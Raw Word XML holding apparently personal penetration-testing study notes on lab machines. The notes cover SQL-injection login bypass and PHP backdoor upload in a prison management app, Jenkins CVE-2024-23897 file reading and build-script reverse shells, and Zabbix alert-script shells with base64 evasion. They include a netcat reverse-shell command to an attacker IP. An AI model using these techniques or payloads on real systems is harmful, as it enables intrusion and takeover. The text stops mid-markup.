    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB0">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fast5 Prison Management System</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1362">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">vmdak</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, it was vulnerable to authentication bypass through a basic SQL injection payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1363">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/52017</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once we got authenticated, we used an authenticated remote code execution (RCE) issue in the add-admin.php functionality. We did this manually by going to /Admin/add-admin.php and created a user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I intercepted the request using Burp Suite and modified the image content to include a PHP one-liner backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2806700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="193" name="image184.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image184.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1364"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2806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B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the PHP backdoor was successfully uploaded, I triggered a reverse shell using a BusyBox payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload used:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> busybox nc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.45.xxx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1234</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ABA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ABB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jenkins </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited in both </w:t>
      </w:r>
      <w:hyperlink r:id="rId1365">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">vmdak</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice and also in Builder HTB. I will only be talking about vmdak since I haven't looked back at Builder HTB in a long time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ABC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First we used CVE-2024–23897 to get LFI as unauthenticated user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ABD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1366">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/godylockz/CVE-2024-23897</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ABE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we used that LFI to get admin password (specific to this box)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ABF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once we had credentials, we could use the Jenkins website to create "new builds" and we can inject code to those builds, like reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4399156" cy="3757613"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="192" name="image196.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image196.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1367"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4399156" cy="37576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C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create new build</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4167188" cy="3475948"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="66" name="image52.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image52.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1368"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4167188" cy="347594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C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put in rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4731327" cy="3252788"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="461" name="image442.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image442.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1369"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4731327" cy="3252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C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Build it </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then start listener and you should have root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this didn't work, since we have shell from earlier, we could try many alternate methods like giving our user all sudo, or making /bin/bash with SUID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ACA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1436"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOPlanning was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1370">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BitForge</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG practice but it was a pretty long process since it took a long time to get credentials which were needed for RCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ACB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ACC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zabbix from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1371">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zab</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG practice was a legit service that was seen in the running processes via pspy64 but also it has ports on port 10050 and 10051 that were only listening on local host. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ACD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was a really long attack. We first had to search up the Zabbix config file location which was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usr/share/zabbix/ui/conf/zabbix.conf.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ACE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then those creds were used in mysql to get creds for Zabbix website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once inside of Zabbix website, we could upload reverse shell Alert scripts and then using monitoring to trigger the script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But it didn't work probably because it detected our rev shell so we had to use base64 encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="673100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="496" name="image490.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image490.png"/>
